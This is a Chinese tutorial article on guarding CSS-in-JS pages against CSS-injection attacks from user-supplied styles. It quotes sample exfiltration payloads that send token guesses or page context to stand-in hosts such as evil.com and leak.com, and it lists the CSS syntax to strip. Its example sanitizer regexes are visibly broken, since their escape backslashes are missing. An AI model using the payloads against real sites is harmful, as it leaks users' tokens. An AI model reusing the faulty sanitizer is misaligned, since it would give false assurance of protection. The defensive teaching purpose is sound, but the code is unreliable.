怎样在CSS-in-JS中安全注入用户自定义CSS避免XSS攻击

阿静小哥_8442

阿静小哥_8442

2026-10-08

315人浏览

原创

style.textcontent = usercss 不安全,因 css 支持 url()、属性选择器、@import 等可发起网络请求或读取 dom 的能力,绕过 csp script-src 限制,导致 token 泄露等风险。

怎样在css-in-js中安全注入用户自定义css避免xss攻击

直接拼接用户输入进 textContent 或 innerHTML 是高危操作,哪怕只用 style.textContent = userCss 也会触发 CSS 注入,导致敏感属性(如 background-image: url(https://attacker.com/?token=...))泄露 CSRF token 等信息。

为什么 style.textContent = userCss 不安全

CSS 本身不是“被动样式”,它支持属性选择器、@import、url()、expression()(旧 IE)、字体加载回调等可发起网络请求或读取 DOM 的能力。攻击者可构造如下内容:

  • [data-token^="a"] { background: url(https://evil.com/log?a) } → 猜解 token 首字母
  • @import "https://mal.io/steal.css"; → 外链恶意规则
  • body { font-family: "x", local("foo"), url(https://leak.com/?css=1); } → 触发请求暴露上下文

浏览器不会报错,但已悄悄外发请求。这类攻击不执行 JS,绕过 CSP 的 script-src 限制,专攻 style-src 和 connect-src 的盲区。

必须剥离的危险语法关键词

对用户提交的 CSS 字符串,不能仅靠白名单标签过滤(CSS 没有“标签”概念),而要主动移除或拒绝以下模式:

  • 所有 @import、@charset、@namespace 规则(非标准且可控性差)
  • 含 url( 的声明,除非显式白名单协议(如仅允许 url(data: 或 url(#)
  • 属性选择器中含 ^=、$=、*=、|= 的表达式(用于猜解)
  • 函数名如 attr()、element()、counter()(部分可读取 DOM 值)
  • 任何以 -webkit-、-moz- 开头的私有前缀 + 危险值组合(如 -webkit-text-stroke: 1px url(...))

注意:calc()、var(--x)、rgba() 等安全函数可保留;但 url() 必须严格拦截,哪怕写成 url( /x )(空格绕过)也要匹配。

推荐做法:用正则预清洗 + CSS 解析器二次校验

单靠正则无法 100% 安全解析 CSS,但生产环境可用两层防护降低风险:

Browser Js
Browser Js

轻量级CDP浏览器控制,适用于AI代理。相较于内置浏览器工具,token消耗降低3‑10倍,仅在浏览时使用。

下载
  • 第一层:用宽松正则快速剔除明显恶意片段(如 /@import|url([^)]*https?:///gi)
  • 第二层:用轻量解析器如 css-tree(仅 30KB)遍历 AST,检查每个 Url 节点的 protocol、每个 Selector 是否含危险属性匹配符
  • 插入前用 style.setAttribute('data-safe', 'true') 标记,后续可通过 MutationObserver 拦截非法重写

示例清洗逻辑(简化):

const cleanCss = (input) => {
  // 移除 @ 规则和 url() 中的远程地址
  let cleaned = input.replace(/@[w-]+s*[^;{]*{?/gi, '');
  cleaned = cleaned.replace(/url(s*["']?https?:///gi, 'url(about:blank');
  // 移除危险属性选择器
  cleaned = cleaned.replace(/[.*[\^$*|]=/g, '[');
  return cleaned;
};

该函数不保证绝对安全,仅作初步过滤;真实项目中必须搭配 AST 校验,否则仍可能被 /* */ 注释包裹绕过。

更安全的替代方案:放弃自由 CSS,改用受限样式 API

如果业务只要求“换色”“改字号”“切主题”,根本不需要开放原始 CSS —— 这是绝大多数场景的真实需求:

  • 定义明确的样式 schema,如 { primaryColor: '#007bff', fontSize: '14px', borderRadius: '4px' }
  • 服务端或前端用预设模板生成 CSS 字符串::root { --primary-color: ${escapeCssValue(data.primaryColor)}; }
  • 所有用户可控字段都走 escapeCssValue()(对引号、反斜杠、括号做 Unicode 转义)
  • 最终注入仍用 style.textContent,但输入源是受控键值对,而非原始字符串

这种方案彻底规避了 CSS 注入面,也避免了运行时解析开销。真正需要“写 CSS”的用户(如低代码平台开发者),应置于沙箱 iframe 中隔离执行,并禁用其访问父页面 DOM 的权限。

最容易被忽略的一点:即使你做了完整清洗,只要把用户 CSS 插入到当前域的 <style></style> 中,它就能读取同域下所有元素的属性值(包括 data-token、aria-label 等),这是 CSS 规范本身的能力,无法靠转义消除 —— 唯一可靠解法是域隔离或彻底拒绝自由 CSS 输入。

前端入门到VUE实战笔记:立即使用
在学习笔记中,你将探索 前端 的入门与实战技巧!

相关文章

PHP速学视频免费教程(入门到精通)
PHP速学视频免费教程(入门到精通)

PHP怎么学习?PHP怎么入门?PHP在哪学?PHP怎么学才快?不用担心,这里为大家提供了PHP速学教程(入门到精通),有需要的小伙伴保存下载就能学习啦!

下载

相关标签:

css js

本站声明:本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系admin@php.cn

相关专题

更多
css
css

css是层叠样式表,用来表现HTML或XML等文件样式的计算机语言,不仅可以静态地修饰网页,还可以配合各种脚本语言动态地对网页各元素进行格式化。php中文网还为大家带来html的相关下载资源、相关课程以及相关文章等内容,供大家免费下载使用。

2023.06.15

4356

6

css居中
css居中

css居中:1、通过“margin: 0 auto; text-align: center”实现水平居中;2、通过“display:flex”实现水平居中;3、通过“display:table-cell”和“margin-left”实现居中。本专题为大家提供css居中的相关的文章、下载、课程内容,供大家免费下载体验。

2023.07.27

957

5

css如何插入图片
css如何插入图片

cssCSS是层叠样式表(Cascading Style Sheets)的缩写。它是一种用于描述网页或应用程序外观和样式的标记语言。CSS可以控制网页的字体、颜色、布局、大小、背景、边框等方面,使得网页的外观更加美观和易于阅读。php中文网给大家带来了相关的教程以及文章,欢迎大家前来阅读学习。

2023.07.28

1818

6

css超出显示...
css超出显示...

在CSS中,当文本内容超出容器的宽度或高度时,可以使用省略号来表示被隐藏的文本内容。本专题为大家提供css超出显示...的相关文章,相关教程,供大家免费体验。

2023.08.01

3406

7

css字体颜色
css字体颜色

CSS中,字体颜色可以通过属性color来设置,用于控制文本的前景色,字体颜色在网页设计中起到很重要的作用,具有以下表现作用:1、提升可读性;2、强调重点信息;3、营造氛围和美感;4、用于呈现品牌标识或与品牌形象相符的风格。

2023.08.10

6825

11

什么是css
什么是css

CSS是层叠样式表(Cascading Style Sheets)的缩写,是一种用于描述网页(或其他基于 XML 的文档)样式与布局的标记语言,CSS的作用和意义如下:1、分离样式和内容;2、页面加载速度优化;3、实现响应式设计;4、确保整个网站的风格和样式保持统一。

2023.08.10

5811

7

css三角形怎么写
css三角形怎么写

CSS可以通过多种方式实现三角形形状,本专题为大家提供css三角形怎么写的相关教程,大家可以免费体验。

2023.08.21

1977

9

css设置文字颜色
css设置文字颜色

CSS(层叠样式表)可以用于设置文字颜色,这样做有以下好处和优势:1、增加网页的可视化效果;2、突出显示某些重要的信息或关键字;3、增强品牌识别度;4、提高网页的可访问性;5、引起不同的情感共鸣。

2023.08.22

2751

5

css禁止点击事件
css禁止点击事件

实现css禁止点击事件的方法有使用CSS的pointer-events属性和使用JavaScript禁用点击事件。本专题为大家提供点击事件相关的文章、下载、课程内容,供大家免费下载体验。

2023.08.23

2393

5

热门下载

更多
网站特效
/
网站源码
/
网站素材
/
前端模板

精品课程

更多
相关推荐
/
热门推荐
/
最新课程
Sass 教程
Sass 教程

共14课时 | 1.5万人学习

Bootstrap 5教程
Bootstrap 5教程

共46课时 | 5.8万人学习

CSS教程
CSS教程

共754课时 | 96.2万人学习